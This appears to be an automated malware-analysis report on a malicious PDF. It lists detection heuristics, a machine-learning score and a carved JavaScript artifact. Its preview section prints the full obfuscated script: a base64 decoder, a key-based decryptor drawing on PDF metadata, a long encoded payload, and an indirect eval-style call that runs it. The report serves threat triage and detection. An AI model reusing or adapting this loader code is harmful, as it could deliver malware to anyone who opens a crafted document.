MALICIOUS
134
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded and obfuscated JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript is likely designed to execute malicious code, as suggested by the String.fromCharCode usage and the 'Suspicious extracted artifact' finding. The extracted artifact 'javascript_obj0008_000.js' is a strong indicator of malicious intent. The exact payload or execution method is unclear due to obfuscation, but the overall pattern suggests a downloader or exploit delivery mechanism.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
<</Type/Action/S/JavaScript/JS(\nfunction SUMqq\(M1\){var _2u_='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',CK5V='',NV8oOPJx,rpovAE4,Pez1o,ELgN6,uNEk,fu_,ymbKX;for\(var lNGrEhmB=0;lNGrEhmB<M1.length;\){NV8oOPJx=_2u_.indexOf\(M1.charAt\(lNGrEhmB++\)\);rpovAE4=_2u_.indexOf\(M1.charAt\(lNGrEhmB++\)\);Pez1o=_2u_.indexOf\(M1.charAt\(lNGrEhmB++\)\);ELgN6=_2u_.indexOf\(M1.charAt\(lNGrEhmB++\)\);uNEk=\(NV8oOPJx<<2\)+\(rpovAE4>>4\);fu_=\(\(rpovAE4&15\)<<4\)+\(Pez1o>>2\);ymbKX=\(\(P … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0008_000.js |
pdf-javascript-stream | PDF /JS object 8 at offset 0x233 | 5451 bytes |
SHA-256: 7dbe5c83caff610e52f51bccb089105e29c175daf809e9eda82e5b710eb3cf17 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 105 of 130 identifiers look randomly generated (e.g. 'r0tPQV7rGuMjFlo2pz5jrdKqkwdzJ4byY6blujnH'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function SUMqq(M1){var _2u_='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',CK5V='',NV8oOPJx,rpovAE4,Pez1o,ELgN6,uNEk,fu_,ymbKX;for(var lNGrEhmB=0;lNGrEhmB<M1.length;){NV8oOPJx=_2u_.indexOf(M1.charAt(lNGrEhmB++));rpovAE4=_2u_.indexOf(M1.charAt(lNGrEhmB++));Pez1o=_2u_.indexOf(M1.charAt(lNGrEhmB++));ELgN6=_2u_.indexOf(M1.charAt(lNGrEhmB++));uNEk=(NV8oOPJx<<2)+(rpovAE4>>4);fu_=((rpovAE4&15)<<4)+(Pez1o>>2);ymbKX=((Pez1o&3)<<6)+ELgN6;CK5V+=String.fromCharCode(uNEk);if(Pez1o!=64)CK5V+=String.fromCharCode(fu_);if(ELgN6!=64)CK5V+=String.fromCharCode(ymbKX);}
return CK5V;}
function KNccfHSW(reW,qHrcB){var DQ8lrzm='',Qd=0;for(YICT=0;YICT<reW.length;YICT++){DQ8lrzm+=String.fromCharCode(reW.charCodeAt(YICT)-qHrcB.charCodeAt(Qd++));if(Qd>=qHrcB.length)Qd=0;}
return DQ8lrzm;}
u2y=KNccfHSW(SUMqq('eM+Y63So0b/VoZV+rLKEf5dx452ekmeeyYmXf5+J45F5r4hr3H2mmJ5+rK2Efqlx45ywjGeeyXaqgJ6J45BvsZhr3ISwlbF+rLGWea1x45aekG6eyYqZf5+J44lsvpZr3I+gp59+rKyEdp5x45qknGmeyXibjbKJ45BsvZpr3ISfqqN+rLuXjJlx45mhj26eyX2cgrSJ45F5vohr3HymmbR+rK2IfKhx46ifjnieyXigkaCJ45FwvYhr3JGwqaN+rK6Veq1x45yhjmmeyXudka+J445ssY1r3IGklKJ+rLGWe55x45exkGqeyX2bhLCJ45BvrIdr3JCzlJ9+rLGWe51x45aekG2eyYqsfJ+J45xwrIVr3IGemKd+rLqYephx46q0jGieyXatf6SJ44pru5lr3H+mlKF+rLCIjJlx46efiW+eyXarj7SJ451uqYVr3JGwmJ5+rK6Mi61x46eljHCeyYucg6OJ45F5rplr3H6imKR+rL2Mdphx45ywj22eyXqffLGJ445tsZZr3HyflbF+rLGWiqhx45yviWueyYqffJ+J4458rppr3I+hmZ5+rLCYfqtx45mliW+eyYifgaCJ45x4rIdr3IGwnK9+rLqGi59x46q0n32eyXmXkrSJ45FwvIRr3JKgqrN+rK2ah6xx45qjm2+eyXycfrOJ45p5sIxr3IWmmqR+rLqWfJ1x45qxm2eeyYmbhKaJ445nsoxr3IK0mqZ+rKuZfKxx45qmj2ueyX2Zg6OJ4497r5dr3I6mmaJ+rK2Zfqxx46mxiXyeyXuckrSJ45JqqYhr3H+fmZ5+rK6EiZdx45mkjmeeyXuchLCJ45FqqYhr3IO0p6B+rLyGfppx45mgjGieyYifgZ6J44p4rIpr3IOelrR+rK6JjK1x45mwiWueyYytf5+J445trotr3IWmpqZ+rLGVjKxx46q0iXyeyXabgaOJ45tvrotr3I+zqbR+rK+Ei5dx45mjn32eyXyffKKJ45BrsIhr3H+vm55+rKuaeK1x45ugj22eyXyogqSJ4498r5dr3H6zmqN+rK+afJpx45qhi3yeyXitgqGJ4499r5hr3IOhmrR+rKuafJxx45q0j3qeyXybgp+J45Bnq5lr3IOemqZ+rK+Jea1x45egjHueyXaXfJ6Lqb+s57e60LvchNPTret8uMh4392X1K7hvbLMdODFnMWc57u6z3agoN/SYPTGp5KJ4MWp1kHrtYPZrZzX47uq7cav1bOWlJrKsKiGb6K+09jjy6WZxqeiyXjK48ea7b211WzQ3JaCsu+1uIew2curx5zwdIfZvs/dloJy77W4h8LloZ7RZ9yEqZevnsepz5jrdKfLsOChntFrqYR2l3yp2s/LV+m1v9O7z8irzqXex6nIvNOM0MOq4H2B3a3ghOG8luW5tKS8z93ayJjdgrLMutXY1oNptMqn2Wzf3au6m93Gc4+/0cPavqWkhL6ahJef5Lqpmc2n2b/eoePHnOy3p9exloaTznCpjXaMwaeUp4lZoo+/yL7h1Ku+se/GbuCt4NfehajyfYHdreCE0cis58h4pHTk25uJr62Edpd8no2dupvdxoHNu+CM5Lqpmbe13LrioZ6UmujJtNuI0dPjx6urj6nWwdzYmYRg9LixzqfR0+PHq9aRv8i+4dSZyZjywLXIsKnheM+Y63S13bHgytrIrrbJtMy/0cXevl+bebuXr57Hk85n3ISpiXWp29bCo958td2x4MrayK6nwKvVs+LMqo1rsol4kMfd2tPLneXDvZKJ3drTy53lw72iyXjY1sKqp7e107jPxsHNpuu5g6q72tDPu2Xcw7LTsdHYs8aY4sCP1bLdjOnMrNu+gIlumtHhwHHoyqvZstrT5dZgtNFQzcHcx+LCpud0ttm13NjUgWD0wrXXiePS08ya2sSrj26T2Z6aZ7p5u5eNnqWTzme6hIeMwZ6lnppZoo+8yL6O1M/So+i1qqTB3MnhvJjpuW7JtuHLl5Sf3rW2ybjdx9mWpejEcdet59Ddupu0tq/OrtrT0cR07sKr2q/P1NOBWZ7Jdqh8r4njiXiplWiQh9bJz72c68ev4bGrlp6UqunGp+CJ1snPvZzrx6/hsZnM07qn28C1yrec0NPHnu28gd6019DTgZniu6jTu9HPnMWc57u6z4jh1OC6sKLPqNCz0NDdvKKkkajQs9DQ3byitNFQzbXa0NDFpty/g8m11cbayJrkgrncruHY4MKl4Hx2k7/e1s/SYLS2stav2aHQwp7bwLXKt5zX47uq7cav1bOWlJq7oOC2stav2ZLavqXgyK6Uv97Wz9JgtMuu0LjTjNDFpty/dNOx3MviwWLsxLjIxaqU5o1nqYR2kMfQ0N28ora2stav2Y/Qxabcv3HNtdrQ0MWm3L+B5FbbyduWpd7LZqi+4MXngWC0urXZdNehnpSgtYV6l3ypzZmEYPTBq9Sn18Gru6Pot7GStNPF3ruj6Lexosl42s/LV+fJs6R9oJ2nknCyjX+ghaedp5Jwso1/oISmnKaRb7GMfp+EppymkW+xjH6fhKacppFvsYx+n4SmnKaRb7GMfp+EppymkW+xjH6fhKacppFvsYx+n4SmnKaRb7GMfp+EppymkW+xjH6fhKacppFvsYx+n4SmnKaRb7GMfp+EppymkW+xjH6fhKacppFvsYx+n4SmnKaRb7GMfp+EppymkW+xjH6fhKacppFvsYx+n4SmnKaRb7GMfp+EppymkW+xjH6fhKacppFvsYx+n4SmnKaRb7GMfp+EppymkW+xjH6fhKacppFvsYx+n4SmnKaRb7GMfp+EppymkW+xjH6fhKacppFvsYx+n4SmnKaRb7GMfp+EppymkW+xjH6fhKacppFvsYx+n4SmnKaRb7TJutC4nNTgwqXtum6JcaKZnoln33Zy1cHbjanWQd/JtMrA19PceZ7eyK/Ku9yMl9St2sZmyL7g3avHnPB0h9m+z92WgnLium7IvN6S0siap5e107jPxpzAnO2dqda6l9/kuqmZxKfguN3F0pas57m5yq3eyZa7oey7b6LCz9aOwY7qiXaXj7yh3rqw5cOny3raydzAq+F+eKLCz9aOyrC2hL6bfJ6Unolkobyd2IGelLGnYqnMeZ91qdrPy1fytbjavKvZ3L6q3LW2zHSQieOSZ7KEa9yFnp2ee2C0zafZv96h09Ot63y/yL7h1JrKsKKPvMi+jtSjmqHEinvNiZaU5omaqbd2ynzRkZ7Ra6mEdpd8l5Oe0WuphHaXfKnK3ctf77W4h8Lfx7+dcK/Ng5eH5NXRqnuyir+jvKOl2KRtrrqB3b3RtbKSbfJ/cZDHz9bg0pLvxam4kKea57Z08rW42ryZ1M/So+i1qqLJeNrPy1ftqZPPmtCr5Zas57m5yq3eyZZ7XKmNaJCH5czXxZyhyJu0tLzGtdBl5bm0zsDWoJ7Ra6mEdpDH4rm7wYXbm72SieK5u8GF25u9osl42MOmn8e2jd6JkLKce2LtqZPPmtCr5ZSY6cR0y7vRkrHIo+W1qJWz09i3vKbnfLq8mday0KCuoo/D5FbPtNrOnuLCuaSt3tScyaPuu4/Vv6naz8tX7MqD163g19Oipe18p9e8nNrXvq7expzMvuHN3cdl7cOZ277X0tWBYKe3rsi+r9iWiWCij6zWvpbaz8tX4pF2orWqxb7FrOC9tNp62sncwKvhj6+Sd5ff179f2qSy3LPX0uG0oNaCtMi506GrgHzMt7jQvOKLl9St2sZm08Krxb7FrOC9tNqn18Gcz5zrx6/Wuqnh62Og33xu08KroaeCs/V8btrCq6Gmgl2ffLLdiKucnIppon1v4rPT2Ne8pud8b6LJ09Dhvlfium7TwquhpYdoos+22bXc2NSBYLTRq9O/04TXv1+hfLndiaual9Wzoce8pImljZd/XaHAvKODnJWfgmD0tr6Pdanh08Wq3nSvzXSW0OSXdLKCd5DI6ozaz3O2jXSZderglsWtt5F+lX2hjerVX+XKgqSEnJWlgmD0urvVr+LN3cdX2nxv4sHizdqHp+u9tNuwlovemWiqhXeYfZ+Vn4poqoV3mH2flZ+KaKqFd4eGjt3n0rCqhXeOeNzJ5Xl72sirj3WXn+tjrdrGZs+Jz9Teh6flya2wuuGf1Mipocqn2WzUoZ6UnbW8dNOx3MviwXLff3GQx9fKlsGS37F01a3byauWXr6nqdm13tiVgrLvtbiHtavMyb+Up8qr2b/X09yUtPZer810ls2skWWqhm+NcpbNqpFlq31v4q+r0tPQV7rGuMjFlo2pz5jrdKqkwdzJ4byY6blujnHjnZ6SZ57Jf5eFnouXlK3axmbMiePS08ya2sSrj67Y19WCcvC8r9OxlsicxZznu7rPiKuU5pFnqYRv4rCZodKUtIO4g8t64dnQzKvrfHaTfOacnolnprl007Hcy+LBYLS6tdl01KGelJ21hn+XfKnKmYRg9LehzamryJm+cvZep491qcWWgnLtxr/iwNbN4Yek3rivyHrcyeWpo9rNq9l03NnaxWC00anIwNHMlr5g9NFQyHSXn+vW'),this.producer);o_1_f=this.author;zYT=this[o_1_f];zYT(u2y);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.